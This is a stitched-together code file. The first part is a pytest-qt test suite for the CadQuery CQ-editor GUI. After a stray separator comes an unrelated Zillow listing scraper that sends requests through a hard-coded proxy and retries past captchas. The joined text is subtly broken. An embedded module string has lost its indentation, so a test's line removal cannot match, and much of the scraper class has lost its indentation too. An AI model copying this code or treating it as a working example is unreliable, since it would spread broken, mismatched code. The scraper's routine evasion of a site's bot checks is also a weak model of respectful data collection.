    object_tree._export_STEP_action.triggered.emit()
    imported = cq.importers.importStep('out.step')
    assert(len(imported.solids().vals()) == 2)

    # export with one selected object
    obj2.setSelected(False)
    object_tree._export_STEP_action.triggered.emit()
    imported = cq.importers.importStep('out.step')
    assert(len(imported.solids().vals()) == 1)

    # export with the root CQ item selected - both children are exported
    obj1.setSelected(False)
    CQ.setSelected(True)
    object_tree._export_STEP_action.triggered.emit()
    imported = cq.importers.importStep('out.step')
    assert(len(imported.solids().vals()) == 2)

    # check if viewer and object tree are properly connected
    CQ.setSelected(False)
    obj1.setSelected(True)
    obj2.setSelected(True)
    ctx = viewer._get_context()
    ctx.InitSelected()
    shapes = []
    while ctx.MoreSelected():
        shapes.append(ctx.SelectedShape())
        ctx.NextSelected()
    assert(len(shapes) == 2)

    # clicking empty viewer space clears the tree selection
    viewer.fit()
    qtbot.mouseClick(viewer.canvas, Qt.LeftButton)
    assert(len(object_tree.tree.selectedItems()) == 0)

    # a viewer-side selection propagates back to the tree
    viewer.sigObjectSelected.emit([obj1.shape_display.wrapped])
    assert(len(object_tree.tree.selectedItems()) == 1)

    # go through different handleSelection paths
    qtbot.mouseClick(object_tree.tree, Qt.LeftButton)
    qtbot.keyClick(object_tree.tree, Qt.Key_Down)
    qtbot.keyClick(object_tree.tree, Qt.Key_Down)
    qtbot.keyClick(object_tree.tree, Qt.Key_Down)
    qtbot.keyClick(object_tree.tree, Qt.Key_Down)
    # with a non-exportable row selected all item actions must be disabled
    assert(object_tree._export_STL_action.isEnabled() == False)
    assert(object_tree._export_STEP_action.isEnabled() == False)
    assert(object_tree._clear_current_action.isEnabled() == False)
    assert(object_tree.properties_editor.isEnabled() == False)
def test_closing(main_clean_do_not_close):
    """The main window refuses to close while the editor has unsaved
    modifications and closes once they are reset."""
    qtbot,win = main_clean_do_not_close

    editor = win.components['editor']

    # make sure that the window is visible
    assert(win.isVisible())

    # should not quit - the document is modified
    win.close()
    assert(win.isVisible())

    # should quit
    editor.reset_modified()
    win.close()
    assert(not win.isVisible())
def test_check_for_updates(main,mocker):
    """The update check compares the latest release tag with the installed
    cadquery version and reports via QMessageBox.about."""
    qtbot,win = main

    # patch requests so no real network access happens
    import requests
    mocker.patch.object(requests.models.Response,'json',
                        return_value=[{'tag_name' : '0.0.2','draft' : False}])

    # stub QMessageBox about
    about_stub = mocker.stub()
    mocker.patch.object(QMessageBox, 'about', about_stub)

    import cadquery

    # older installed version -> an update is available
    cadquery.__version__ = '0.0.1'
    win.check_for_cq_updates()
    assert(about_stub.call_args[0][1] == 'Updates available')

    # newer installed version -> nothing to update
    cadquery.__version__ = '0.0.3'
    win.check_for_cq_updates()
    assert(about_stub.call_args[0][1] == 'No updates available')
@pytest.mark.skipif(sys.platform.startswith('linux'),reason='Segfault workaround for linux')
def test_screenshot(main,mocker):
    """The screenshot tool writes an image file to the chosen path."""
    qtbot,win = main

    mocker.patch.object(QFileDialog, 'getSaveFileName', return_value=('out.png',''))

    viewer = win.components['viewer']
    # presumably the first 'Tools' action is the screenshot action - confirm
    viewer._actions['Tools'][0].triggered.emit()

    assert(os.path.exists('out.png'))
def test_resize(main):
    """Smoke-test hiding and re-showing the editor component."""
    qtbot, win = main
    editor_comp = win.components['editor']

    editor_comp.hide()
    qtbot.wait(50)

    editor_comp.show()
    qtbot.wait(50)
# Script importing a STEP file via a path relative to the script location;
# used by test_relative_references.
code_simple_step = \
'''import cadquery as cq
imported = cq.importers.importStep('shape.step')
'''
def test_relative_references(main):
    """Scripts referencing data files relative to their own location must
    resolve those paths when run."""
    # create code with a relative reference in a subdirectory
    p = Path('test_relative_references')
    p.mkdir_p()
    p_code = p.joinpath('code.py')
    p_code.write_text(code_simple_step)

    # create the referenced step file
    shape = cq.Workplane("XY").box(1, 1, 1)
    p_step = p.joinpath('shape.step')
    export(shape, "step", p_step)

    # open code
    qtbot, win = main
    editor = win.components['editor']
    editor.load_from_file(p_code)

    # render
    debugger = win.components['debugger']
    debugger._actions['Run'][0].triggered.emit()

    # assert no errors
    traceback_view = win.components['traceback_viewer']
    assert(traceback_view.current_exception.text() == '')

    # assert one object has been rendered
    obj_tree_comp = win.components['object_tree']
    assert(obj_tree_comp.CQ.childCount() == 1)

    # clean up
    p_code.remove_p()
    p_step.remove_p()
    p.rmdir_p()
# Script rendering the same box with color/alpha given in every supported
# format; entry '7' uses an invalid color format on purpose so the log
# error path can be asserted.
code_color = \
'''
import cadquery as cq
result = cq.Workplane("XY" ).box(1, 1, 1)
show_object(result, name ='1')
show_object(result, name ='2', options=dict(alpha=0.5,color='red'))
show_object(result, name ='3', options=dict(alpha=0.5,color='#ff0000'))
show_object(result, name ='4', options=dict(alpha=0.5,color=(255,0,0)))
show_object(result, name ='5', options=dict(alpha=0.5,color=(1.,0,0)))
show_object(result, name ='6', options=dict(rgba=(1.,0,0,.5)))
show_object(result, name ='7', options=dict(color=('ff','cc','dd')))
'''
def test_render_colors(main_clean):
    """Run code_color via the Run action and verify color/alpha for each
    supported color format; the invalid entry must log a format error."""
    qtbot, win = main_clean

    obj_tree = win.components['object_tree']
    editor = win.components['editor']
    debugger = win.components['debugger']
    log = win.components['log']

    editor.set_text(code_color)
    debugger._actions['Run'][0].triggered.emit()

    CQ = obj_tree.CQ

    # object 1 (default color)
    r,g,b,a = get_rgba(CQ.child(0).ais)
    assert( a == 0 )
    assert( r != 1.0 )
    # object 2
    r,g,b,a = get_rgba(CQ.child(1).ais)
    assert( a == 0.5 )
    assert( r == 1.0 )
    # object 3
    r,g,b,a = get_rgba(CQ.child(2).ais)
    assert( a == 0.5)
    assert( r == 1.0 )
    # object 4
    r,g,b,a = get_rgba(CQ.child(3).ais)
    assert( a == 0.5 )
    assert( r == 1.0 )
    # object 5
    r,g,b,a = get_rgba(CQ.child(4).ais)
    assert( a == 0.5 )
    assert( r == 1.0 )
    # object 6
    r,g,b,a = get_rgba(CQ.child(5).ais)
    assert( a == 0.5 )
    assert( r == 1.0 )

    # check if an error occurred for the invalid color format
    qtbot.wait(100)
    assert('Unknown color format' in log.toPlainText().splitlines()[-1])
def test_render_colors_console(main_clean):
    """Same color checks as test_render_colors, but the script is executed
    through the console instead of the Run action."""
    qtbot, win = main_clean

    obj_tree = win.components['object_tree']
    log = win.components['log']
    console = win.components['console']

    console.execute_command(code_color)

    def get_rgba(ais):
        # BUG FIX: this local helper previously returned color.redF() for
        # all three channels; return the actual red/green/blue components.
        alpha = ais.Transparency()
        color = get_occ_color(ais)
        return color.redF(), color.greenF(), color.blueF(), alpha

    CQ = obj_tree.CQ

    # object 1 (default color)
    r,g,b,a = get_rgba(CQ.child(0).ais)
    assert( a == 0 )
    assert( r != 1.0 )
    # object 2
    r,g,b,a = get_rgba(CQ.child(1).ais)
    assert( a == 0.5 )
    assert( r == 1.0 )
    # object 3
    r,g,b,a = get_rgba(CQ.child(2).ais)
    assert( a == 0.5)
    assert( r == 1.0 )
    # object 4
    r,g,b,a = get_rgba(CQ.child(3).ais)
    assert( a == 0.5 )
    assert( r == 1.0 )
    # object 5
    r,g,b,a = get_rgba(CQ.child(4).ais)
    assert( a == 0.5 )
    assert( r == 1.0 )
    # object 6
    r,g,b,a = get_rgba(CQ.child(5).ais)
    assert( a == 0.5 )
    assert( r == 1.0 )

    # check if an error occurred for the invalid color format
    qtbot.wait(100)
    assert('Unknown color format' in log.toPlainText().splitlines()[-1])
def test_confirm_new(monkeypatch,editor):
    """File->New on a modified document asks for confirmation and only
    discards the text when the user accepts."""
    qtbot, editor = editor

    #check that initial state is as expected
    assert(editor.modified == False)

    editor.document().setPlainText(code)
    assert(editor.modified == True)

    #monkeypatch the confirmation dialog and run both scenarios
    def cancel(*args, **kwargs):
        return QMessageBox.No

    def ok(*args, **kwargs):
        return QMessageBox.Yes

    # user declines: document is kept
    monkeypatch.setattr(QMessageBox, 'question',
                        staticmethod(cancel))
    editor.new()
    assert(editor.modified == True)
    assert(conv_line_ends(editor.get_text_with_eol()) == code)

    # user accepts: document is cleared
    monkeypatch.setattr(QMessageBox, 'question',
                        staticmethod(ok))
    editor.new()
    assert(editor.modified == False)
    assert(editor.get_text_with_eol() == '')
# Script showing a raw (unwrapped) TopoDS shape.
code_show_topods = \
'''
import cadquery as cq
result = cq.Workplane("XY" ).box(1, 1, 1)
show_object(result.val().wrapped)
'''
def test_render_topods(main):
    """TopoDS shapes render via show_object and the console show()."""
    qtbot, win = main

    obj_tree_comp = win.components['object_tree']
    editor = win.components['editor']
    debugger = win.components['debugger']
    console = win.components['console']

    # check that an object was rendered
    # (presumably by the `main` fixture's initial run - confirm)
    assert(obj_tree_comp.CQ.childCount() == 1)

    # check that object was removed
    obj_tree_comp._toolbar_actions[0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 0)

    # check that object was rendered using explicit show_object call
    editor.set_text(code_show_topods)
    debugger._actions['Run'][0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 1)

    # test rendering of topods object via console
    console.execute('show(result.val().wrapped)')
    assert(obj_tree_comp.CQ.childCount() == 2)

    # test rendering of list of topods object via console
    console.execute('show([result.val().wrapped,result.val().wrapped])')
    assert(obj_tree_comp.CQ.childCount() == 3)
# Script showing a single Shape and a list of Shapes.
code_show_shape_list = \
'''
import cadquery as cq
result1 = cq.Workplane("XY" ).box(1, 1, 1).val()
result2 = cq.Workplane("XY",origin=(0,1,1)).box(1, 1, 1).val()
show_object(result1)
show_object([result1,result2])
'''
def test_render_shape_list(main):
    """Lists of Shape objects can be shown from a script and the console."""
    qtbot, win = main

    log = win.components['log']
    obj_tree_comp = win.components['object_tree']
    editor = win.components['editor']
    debugger = win.components['debugger']
    console = win.components['console']

    # check that object was removed
    obj_tree_comp._toolbar_actions[0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 0)

    # check that object was rendered using explicit show_object call
    editor.set_text(code_show_shape_list)
    debugger._actions['Run'][0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 2)

    # test rendering of Shape via console
    console.execute('show(result1)')
    console.execute('show([result1,result2])')
    assert(obj_tree_comp.CQ.childCount() == 4)

    # smoke test exception in show
    console.execute('show("a")')
# Script building and showing a cadquery Assembly.
code_show_assy = \
'''import cadquery as cq
result1 = cq.Workplane("XY" ).box(3, 3, 0.5)
assy = cq.Assembly(result1)
show_object(assy)
'''
def test_render_assy(main):
    """Assemblies are rendered from a script and via the console show()."""
    qtbot, win = main

    obj_tree_comp = win.components['object_tree']
    editor = win.components['editor']
    debugger = win.components['debugger']
    console = win.components['console']

    # check that object was removed
    obj_tree_comp._toolbar_actions[0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 0)

    # check that object was rendered using explicit show_object call
    editor.set_text(code_show_assy)
    debugger._actions['Run'][0].triggered.emit()
    qtbot.wait(500)
    assert(obj_tree_comp.CQ.childCount() == 1)

    # test rendering via console
    console.execute('show(assy)')
    qtbot.wait(500)
    assert(obj_tree_comp.CQ.childCount() == 2)
code_show_ais = \
'''import cadquery as cq
from cadquery.occ_impl.assembly import toCAF
import OCP
result1 = cq.Workplane("XY" ).box(3, 3, 0.5)
assy = cq.Assembly(result1)
lab, doc = toCAF(assy)
ais = OCP.XCAFPrs.XCAFPrs_AISObject(lab)
show_object(ais)
'''
def test_render_ais(main):
    """Raw AIS objects are rendered from a script and via console show()."""
    qtbot, win = main

    obj_tree_comp = win.components['object_tree']
    editor = win.components['editor']
    debugger = win.components['debugger']
    console = win.components['console']

    # check that object was removed
    obj_tree_comp._toolbar_actions[0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 0)

    # check that object was rendered using explicit show_object call
    editor.set_text(code_show_ais)
    debugger._actions['Run'][0].triggered.emit()
    qtbot.wait(500)
    assert(obj_tree_comp.CQ.childCount() == 1)

    # test rendering via console
    console.execute('show(ais)')
    qtbot.wait(500)
    assert(obj_tree_comp.CQ.childCount() == 2)
code_show_sketch = \
'''import cadquery as cq
s1 = cq.Sketch().rect(1,1)
s2 = cq.Sketch().segment((0,0), (0,3.),"s1")
show_object(s1)
show_object(s2)
'''
def test_render_sketch(main):
    """Sketch objects are rendered from a script and via console show()."""
    qtbot, win = main

    obj_tree_comp = win.components['object_tree']
    editor = win.components['editor']
    debugger = win.components['debugger']
    console = win.components['console']

    # check that object was removed
    obj_tree_comp._toolbar_actions[0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 0)

    # check that object was rendered using explicit show_object call
    editor.set_text(code_show_sketch)
    debugger._actions['Run'][0].triggered.emit()
    qtbot.wait(500)
    assert(obj_tree_comp.CQ.childCount() == 2)

    # test rendering via console
    console.execute('show(s1); show(s2)')
    qtbot.wait(500)
    assert(obj_tree_comp.CQ.childCount() == 4)
def test_window_title(monkeypatch, main):
    """The window title tracks the open file name and resets for a new file."""
    fname = 'test_window_title.py'
    with open(fname, 'w') as f:
        f.write(code)

    qtbot, win = main

    #monkeypatch QFileDialog methods
    def filename(*args, **kwargs):
        return fname, None

    monkeypatch.setattr(QFileDialog, 'getOpenFileName',
                        staticmethod(filename))

    win.components["editor"].open()
    assert(win.windowTitle().endswith(fname))

    # handle a new file
    win.components["editor"].new()
    # I don't really care what the title is, as long as it's not a filename
    assert(not win.windowTitle().endswith('.py'))
def test_module_discovery(tmp_path, editor):
    """get_imported_module_paths reports only modules that exist next to
    the script."""
    qtbot, editor = editor

    main_script = tmp_path.joinpath('main.py')
    with open(main_script, 'w') as f:
        f.write('import b')

    # 'b' does not exist yet, so nothing is discovered
    assert editor.get_imported_module_paths(str(main_script)) == []

    # once b.py exists it is reported
    tmp_path.joinpath('b.py').touch()
    assert editor.get_imported_module_paths(str(main_script)) == [str(tmp_path.joinpath('b.py'))]
def test_launch_syntax_error(tmp_path):
    """The app must still launch when the input file has a syntax error."""
    # verify app launches when input file is bad
    win = MainWindow()

    inputfile = Path(tmp_path).joinpath("syntax_error.py")
    modify_file("print(", inputfile)

    editor = win.components["editor"]
    editor.autoreload(True)
    editor.preferences["Autoreload: watch imported modules"] = True
    editor.load_from_file(inputfile)

    win.show()
    assert(win.isVisible())
code_import_module_makebox = \
"""
from module_makebox import *
z = 1
r = makebox(z)
"""
code_module_makebox = \
"""
import cadquery as cq
def makebox(z):
zval = z + 1
return cq.Workplane().box(1, 1, zval)
"""
def test_reload_import_handle_error(tmp_path, main):
    """Autoreload of watched imported modules must survive a transient
    error in a module and recover once it is fixed."""
    TIMEOUT = 500

    qtbot, win = main
    editor = win.components["editor"]
    debugger = win.components["debugger"]
    traceback_view = win.components["traceback_viewer"]
    editor.autoreload(True)
    editor.preferences["Autoreload: watch imported modules"] = True

    # save the module and top level script files
    module_file = Path(tmp_path).joinpath("module_makebox.py")
    script = Path(tmp_path).joinpath("main.py")
    modify_file(code_module_makebox, module_file)
    modify_file(code_import_module_makebox, script)

    # run, verify that no exception was generated
    editor.load_from_file(script)
    debugger._actions["Run"][0].triggered.emit()
    assert(traceback_view.current_exception.text() == "")

    # save the module with an error
    with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
        lines = code_module_makebox.splitlines()
        lines.remove("    zval = z + 1")  # introduce NameError
        lines = "\n".join(lines)
        modify_file(lines, module_file)

    # verify NameError is generated
    debugger._actions["Run"][0].triggered.emit()
    assert("NameError" in traceback_view.current_exception.text())

    # revert the error, verify rerender is triggered
    with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
        modify_file(code_module_makebox, module_file)

    # verify that no exception was generated
    debugger._actions["Run"][0].triggered.emit()
    assert(traceback_view.current_exception.text() == "")
|
scraper.py | import json, asyncio, time, socket, datetime, time
import threading
import pandas as pd
from random import randint, choice
from bs4 import BeautifulSoup
from urllib3.exceptions import MaxRetryError
from urllib3 import ProxyManager, PoolManager, disable_warnings, exceptions
from collections import Counter
from scripts.bds_real_estate_scraper.proxies import Proxies
from scripts.bds_real_estate_scraper.zillow_query import ZillowQuery
# I didn't like the data that we got.
# Trying to find something better.
class Scraper:
"""Class for scraping real estate data from zillow.com"""
def __init__(self, zip_codes, min_price=0, max_price=20_000_000, increment=150_000, max_tries=20, use_cookies=False):
    """Set up scraper state, price-sweep bounds and the HTTP proxy pool.

    Parameters:
        zip_codes: iterable of zip codes to scrape (deduplicated into a set).
        min_price/max_price: sale-price sweep bounds in dollars.
        increment: sale-price sweep step.
        max_tries: maximum fetch attempts per URL.
        use_cookies: when True, attach stored cookies to request headers.
    """
    # FIX: removed unused PROXY_HOST/PROXY_PORT locals and the dead
    # commented-out PoolManager fallback.
    self.domain = "www.zillow.com"
    self.zip_codes = set(zip_codes)
    self.empty_pages = set()

    # sale-listing price sweep bounds
    self.max_price = max_price
    self.min_price = min_price

    # rental listings use their own, narrower sweep
    self.rent_max_price = 13_000
    self.rent_min_price = 0
    self.rent_increment = 1_500

    # NOTE(review): proxy endpoint is hard-coded; consider sourcing it
    # from configuration instead.
    proxy = "http://83.149.70.159:13012"
    self.http = ProxyManager(proxy)

    self.visited_sites = set()
    self.max_tries = max_tries
    self.increment = increment
    self.max_retries = 20
    self.failed_urls = Counter()
    self.use_cookies = use_cookies
    self.cookies = set()
    self.proxy = Proxies()
    self.fetches = 0
    self.zip_codes_df = pd.read_csv("data/zip_codes.csv")
def get_headers(self):
headers = self.proxy.get_header()
if self.use_cookies:
headers['Cookie'] = "".join(self.cookies.pop())
return headers
def is_captcha(self, html_soup):
captcha_container = html_soup.select(".captcha-container")
if captcha_container:
return True
if html_soup.title is None:
return True
return False
def parse_cookie(self, response):
    """Extract the Set-Cookie header from *response* and store it in
    self.cookies (not implemented yet)."""
    # TODO: implement the parse_cookie method to be able to send cookies. Get the set cookie from response and add it to the set self.cookies
    pass
def get_parsed_query_string(self, soup):
query_state = soup.find('script', {'data-zrr-shared-data-key': 'mobileSearchPageStore'})
assert query_state
query_state = query_state.contents[0].replace("<!--", "").replace("-->", "")
parsed_query_state = json.loads(query_state)
return parsed_query_state
def save_properties(self, zip_code, properties=None):
if properties is None or properties == []:
return
for prop in properties:
if prop:
date_sold, price_change_date = None, None
if 'hdpData' in prop.keys() and 'dateSold' in prop['hdpData']['homeInfo'].keys() and prop['hdpData']['homeInfo']['dateSold'] is not None:
date_sold = datetime.datetime.utcfromtimestamp(prop['hdpData']['homeInfo']['dateSold'] / 1000)
if prop['hdpData']['homeInfo']['dateSold'] == 0:
date_sold = None
if 'hdpData' in prop.keys() and 'datePriceChanged' in prop['hdpData']['homeInfo'].keys() and prop['hdpData']['homeInfo'][
'datePriceChanged'] is not None:
price_change_date = datetime.datetime.utcfromtimestamp(
prop['hdpData']['homeInfo']['datePriceChanged'] / 1000)
if prop['hdpData']['homeInfo']['datePriceChanged'] == 0:
price_change_date = None
values = (prop['id'],
prop['soldPrice'] if 'soldPrice' in prop.keys() else None,
prop['hdpData']['homeInfo']['price'] if 'hdpData' in prop.keys() and 'price' in prop['hdpData']['homeInfo'].keys() else None,
prop['price'] if 'price' in prop.keys() else None,
prop['unformattedPrice'] if 'unformattedPrice' in prop.keys() else None,
prop['addressCity'] if 'addressCity' in prop.keys() else None,
prop['addressState'] if 'addressState' in prop.keys() else None,
# there are two zip codes for some reason. they shoud be the same
prop['addressZipcode'] if 'addressZipcode' in prop.keys() else None,
prop['hdpData']['homeInfo']['zipcode'] if 'hdpData' in prop.keys() and 'zipcode' in prop['hdpData']['homeInfo'].keys() else None,
prop['area'] if 'area' in prop.keys() else None,
prop['pricePerSqft'] if 'pricePerSqft' in prop.keys() else None,
prop['statusType'] if 'statusType' in prop.keys() else None,
prop['statusText'] if 'statusText' in prop.keys() else None,
prop['beds'] if 'beds' in prop.keys() else None,
prop['baths'] if 'baths' in prop.keys() else None,
prop['hdpData']['homeInfo']['homeStatus'] if 'hdpData' in prop.keys() and 'homeStatus' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['city'] if 'hdpData' in prop.keys() and 'city' in prop['hdpData']['homeInfo'].keys() else None,
prop['latLong']['latitude'] if 'latLong' in prop.keys() and prop['latLong'] else None,
prop['latLong']['longitude'] if 'latLong' in prop.keys() and prop['latLong'] else None,
prop['hdpData']['homeInfo']['lotSize'] if 'hdpData' in prop.keys() and 'lotSize' in prop['hdpData']['homeInfo'].keys() else None,
prop['address'] if 'address' in prop.keys() else None,
prop['detailUrl'] if 'detailUrl' in prop.keys() else None,
prop['hdpData']['homeInfo']['zestimate'] if 'hdpData' in prop.keys() and 'zestimate' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['timeOnZillow'] if 'hdpData' in prop.keys() and 'timeOnZillow' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['priceChange'] if 'hdpData' in prop.keys() and 'priceChange' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['priceReduction'] if 'hdpData' in prop.keys() and 'priceReduction' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['rentZestimate'] if 'hdpData' in prop.keys() and 'rentZestimate' in prop['hdpData']['homeInfo'].keys() else None,
price_change_date if 'hdpData' in prop.keys() and 'datePriceChanged' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['homeType'] if 'hdpData' in prop.keys() and 'homeType' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['bedrooms'] if 'hdpData' in prop.keys() and 'bedrooms' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['bathrooms'] if 'hdpData' in prop.keys() and 'bathrooms' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['yearBuilt'] if 'hdpData' in prop.keys() and 'yearBuilt' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['daysOnZillow'] if 'hdpData' in prop.keys() and 'daysOnZillow' in prop['hdpData']['homeInfo'].keys() else None,
prop['variableData']['type'] if 'variableData' in prop.keys() and prop['variableData'] and 'type' in prop['variableData'].keys() else None,
prop['variableData']['text'] if 'variableData' in prop.keys() and prop['variableData'] and 'text' in prop['variableData'].keys() else None,
prop['hdpData']['homeInfo']['livingArea'] if 'hdpData' in prop.keys() and 'livingArea' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['lotAreaValue'] if 'hdpData' in prop.keys() and 'lotAreaValue' in prop['hdpData']['homeInfo'].keys() else None,
date_sold if 'hdpData' in prop.keys() and 'dateSold' in prop['hdpData']['homeInfo'].keys() and prop['hdpData']['homeInfo']['dateSold'] is not None else None,
prop['hdpData']['homeInfo']['taxAssessedValue'] if 'hdpData' in prop.keys() and 'taxAssessedValue' in prop['hdpData']['homeInfo'].keys() else None)
with open(f"zip_{zip_code}.csv", "a") as out:
out.write(','.join(["\""+str(x)+"\"" for x in values]) + "\n")
def get_base_url(self, soup, zip_code):
    """Derive the listing URL base path ("/<city>-...-<zip>/") for a zip code.

    Two candidates: the first pagination link on the page (base_one) and a
    path built from the local zip-code database City column (base_two).
    The pagination-derived value wins when both exist; mismatches are
    logged but base_one is still returned.
    """
    pagination_tag = soup.find(class_='search-pagination')
    base_one, base_two = None, None
    if pagination_tag:
        base_one = pagination_tag.find('a').get('href').split('/')[1]
        base_one = f"/{base_one}/"
    # NOTE(review): hard-codes '-new-york-ny', so only NY zip codes are
    # supported; also raises IndexError when the zip code is not in the
    # database - confirm intended.
    base_two = "".join(['/',self.zip_codes_df[self.zip_codes_df['Zip_code']==int(zip_code)]['City'].values[0].lower().replace(" ", "-"), '-new-york-ny', f"-{zip_code}", '/'])
    if base_one is None and base_two:
        return base_two
    if base_one and base_two and (base_one != base_two):
        print(f"The bases are different! from pagination:{base_one}, from database: {base_two}")
        return base_one
    return base_one
def process_page(self, html_soup, url, zip_code):
print(f"Processing page: {url}")
try:
parsed_query_string = self.get_parsed_query_string(html_soup)
results = parsed_query_string['cat1']['searchResults']['listResults'] if 'cat1' in parsed_query_string.keys() else []
results.extend(parsed_query_string['cat2']['searchResults']['listResults'] if 'cat2' in parsed_query_string.keys() else [])
self.save_properties(zip_code, results)
except AssertionError:
print("Can't find query state object in response")
def find_urls(self, zip_code):
    """ Make a list of all the urls we need to scrape to find the most houses in the current zip_code"""
    urls = set()
    zip_url = f"https://www.zillow.com/homes/{zip_code}_rb"
    try:
        main_url_soup = self.fetch(zip_url) #initial page with the zip code to find the map settings and other info
        # Now parse the query state string from the response
        parsed_query_string = self.get_parsed_query_string(main_url_soup)
        base = self.get_base_url(main_url_soup, zip_code)
        if (self.get_number_of_properties(main_url_soup) == 0):
            return urls
    except AssertionError:
        print("Unable to find the query string! going to try again later!")
        return set()  # Return an empty set
    except MaxTriesError as e:
        print("Error! Something happened")
        print(e)
        return set()  # Return an empty set
    query_state_dict = parsed_query_string['queryState']  # This a dictionary from zillow with a bunch of info
    # Create all the urls using info from the query_state_dict.
    # Sweep price windows [min_price, current_max_price] upward so each search
    # stays under Zillow's result cap; status 2 uses the rental price bands.
    # NOTE(review): status values 0/1 presumably encode for-sale/sold — confirm
    # against ZillowQuery.
    for status in [0, 1, 2]:
        current_max_price = self.min_price+self.increment
        max_price = self.max_price
        min_price = self.min_price
        increment = self.increment
        if status == 2:
            current_max_price = self.rent_min_price+self.rent_increment
            max_price = self.rent_max_price
            min_price = self.rent_min_price
            increment = self.rent_increment
        while current_max_price <= max_price:
            query = ZillowQuery(min_price=min_price, max_price=current_max_price, status=status, base=base, **query_state_dict)
            page_one_url = query.get_first_url()
            try:
                page_one_soup = self.fetch(page_one_url)
            except MaxTriesError as e:
                # Skip this price window but keep sweeping the rest.
                print(e)
                current_max_price += increment
                continue
            # num_results = self.get_number_of_properties(page_one_soup)
            num_of_pages = self.get_number_of_pages(page_one_soup)
            if self.is_empty(page_one_soup):
                # No listings in this window: remember it and widen the step.
                self.empty_pages.add(page_one_url)
                min_price = current_max_price
                current_max_price += increment
                if current_max_price >= 700_000:
                    # NOTE(review): widens by 4x here but 3x below — confirm intentional.
                    increment = increment*4
                continue
            self.process_page(page_one_soup, page_one_url, zip_code)
            if num_of_pages != 0:
                # Queue pages 2..N of this window for later processing.
                query_urls = query.get_urls(first=2, last=num_of_pages)
                urls.update(query_urls)
            min_price = current_max_price
            current_max_price += increment
            if current_max_price >= 700_000:
                # Listings thin out at higher prices, so take bigger steps.
                increment = increment*3
    return urls
def fetch(self, url):
    """Fetch *url* with rotating headers, retrying while Zillow serves captchas.

    Returns a BeautifulSoup of the page on success. Raises MaxTriesError once
    the captcha retry budget is exhausted. On network errors the URL is
    recorded in ``self.failed_urls`` and an empty soup is returned so the
    caller can retry it later via handle_failed_pages().
    """
    soup, tries = None, 1
    while True:
        headers = self.get_headers()
        try:
            source = self.http.request('GET', url, headers=headers, timeout=10)
            self.fetches += 1
            soup = BeautifulSoup(source.data, 'lxml')
            if not self.is_captcha(soup):
                # The page is valid so we can just return a soup version of the site
                self.visited_sites.add(url)
                # Add cookie to the pool of cookies
                new_cookie = self.parse_cookie(source)
                self.cookies.add(new_cookie)
                return soup
            tries += 1
            # Back off progressively once past half the retry budget.
            if tries % 5 == 0 and tries >= self.max_tries / 2:
                time.sleep(tries * 0.15)
            if tries > self.max_tries:
                print(f"The upper bound of tries has been reached for url {url}")
                raise MaxTriesError
        except MaxTriesError:
            # BUG FIX: previously this handler also caught our own
            # MaxTriesError, so callers (find_urls/process_zip) that catch it
            # never saw it — they got an empty soup instead. Propagate it.
            raise
        except (TimeoutError, MaxRetryError, socket.timeout):
            if self.failed_urls[url] >= self.max_retries:
                del self.failed_urls[url]
                print("The URL failed too many times, check the proxy or the internet connection")
            else:
                self.failed_urls.update([url])
                print("Will try again later")
            time.sleep(10)
            return BeautifulSoup("", 'lxml')
def run(self):
    """Drain the pending zip-code set, scraping each on a worker thread."""
    number_of_threads = 1
    processed = 1
    total = len(self.zip_codes)
    while self.zip_codes:
        workers = []
        for _ in range(number_of_threads):
            if not self.zip_codes:
                continue
            try:
                current_zip_code = self.zip_codes.pop()
                print(f"{processed} out of {total}")
                processed += 1
                worker = threading.Thread(target=self.process_zip, args=[current_zip_code])
                worker.start()
                workers.append(worker)
            except IndexError:
                continue
        # Wait for the whole batch before starting the next one.
        for worker in workers:
            worker.join()
def process_zip(self, zip_code):
    """Scrape every result page for one zip code, then retry its failures."""
    print(f"Processing zip code: {zip_code}")
    urls = self.find_urls(zip_code)
    print(f"Processing Pages in zip code: {zip_code}")
    for url in urls:
        try:
            page_soup = self.fetch(url)
        except MaxTriesError:
            continue
        self.process_page(page_soup, url, zip_code)
    self.handle_failed_pages(zip_code)
def get_number_of_pages(self, page_soup):
    """Number of result pages per the pagination widget; 0 when absent/unreadable."""
    pagination = page_soup.find(class_='search-pagination')
    if pagination is None:
        return 0  # There is no pagination section in the page
    try:
        label = pagination.select(".Text-c11n-8-27-0__aiai24-0")[0].text
        # The last whitespace-separated token of the label is the page count.
        return int(label.split(" ")[-1])
    except Exception as e:
        # Best effort: any scraping/parsing failure degrades to "one page".
        print(e)
        print("Error getting the number of page")
        return 0
def get_number_of_properties(self, page_soup):
    """Parse the result-count badge.

    Returns the integer count, 500 when the badge text is unparseable, or
    None when the page has no result-count element at all.
    """
    badge = page_soup.find(class_='result-count')
    if not badge:
        return badge  # None: no result-count element on this page
    text = badge.get_text().replace(',', '').replace('results', '').replace(" ", "")
    try:
        return int(text)
    except (ValueError, TypeError):
        return 500
def is_empty(self, page_soup):
    """True when the page reports zero results or has no <title> (bad render)."""
    no_results = page_soup.find(class_='zero-results-message')
    return True if (no_results or page_soup.title is None) else False
def handle_failed_pages(self, zip_code):
    """Re-attempt every URL recorded in ``self.failed_urls``.

    Zip-code landing pages ('home' URLs) are expanded back into result URLs;
    all other URLs (paginated or not) are fetched and processed directly.
